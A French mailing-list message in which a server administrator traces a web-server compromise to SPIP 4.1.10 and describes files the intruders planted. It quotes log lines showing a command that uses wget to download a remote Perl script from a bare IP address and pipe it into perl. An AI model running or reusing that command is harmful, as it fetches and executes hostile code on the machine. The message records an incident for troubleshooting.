BERTRAND Joël a écrit : > BERTRAND Joël a écrit : >> OK, je l'ai. >> >> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd >> /dev/shm;wget -O - http://68.235.39.225/sepax|perl >> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd >> /dev/shm;wget -O - http://68.235.39.225/sepax|perl >> >> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais >> toujours pas qui le lance, mais on progresse. > > Et le fautif semble être... SPIP ! Et je ne parle pas d'un SPIP > antédiluvien, mais d'un SPIP 4.1 à jour (4.1.10). J'en ai deux qui se > font fait percer. Mais pas de la même manière. Le premier avait des > fichiers .php étranges dans sa racine : spip__.php et des choses comme > response.php. Le second avait un spip_loader.php qui embarquait un binaire. >
Et j'aurais dû regarder de près les listes de diffusion de SPIP. Ça couine très fort depuis quelques semaines sur le sujet. Comme quoi, certains devraient plutôt s'attacher à la qualité du code qu'au côté politique d'un projet...